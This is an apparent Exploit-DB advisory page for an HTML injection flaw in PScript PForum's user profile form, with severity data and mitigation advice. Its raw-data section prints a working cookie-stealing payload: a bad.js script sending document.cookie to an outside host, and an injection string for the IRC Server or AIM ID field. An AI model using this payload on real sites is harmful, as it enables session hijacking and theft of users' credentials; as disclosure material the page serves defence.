PScript PForum HTML Injection Vulnerability

vendor:

PForum

by:

7.5

CVSS

HIGH

HTML Injection

CWE

Product Name: PForum

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

PScript PForum HTML Injection Vulnerability

The PScript PForum is vulnerable to an HTML injection attack due to insufficient sanitization of user input in the user profile form. This vulnerability can be exploited to steal cookie-based authentication credentials and potentially exploit browser security flaws.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper input sanitization and validation techniques to prevent the injection of malicious HTML code. Additionally, users should be cautious when clicking on untrusted links or visiting untrusted websites.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10954/info

PScript PForum is reported prone to a HTML injection vulnerability. The vulnerability presents itself due to a lack of sufficient sanitization performed on data submitted through input fields of the PForum user profile form.

This could be exploited to steal cookie-based authentication credentials. It is also possible to use this type of vulnerability as an attack vector to exploit latent browser security flaws.

Create a Javascript file and save it as bad.js (your domain name is in this
case example.com). The file contains the following code:

// bad.js
function b()
{
location.href='example.org/compute_stolen_data.ext?'+document.cookie;
}

Edit your profile and enter the following line into the IRC Server or AIM
ID Input Box. The string have to be shorter then 100 characters.

// Input Box (without line break)
"><script src=http://example.com/bad.js></script>
<img height=0 width=0 src=foo onerror=b(); >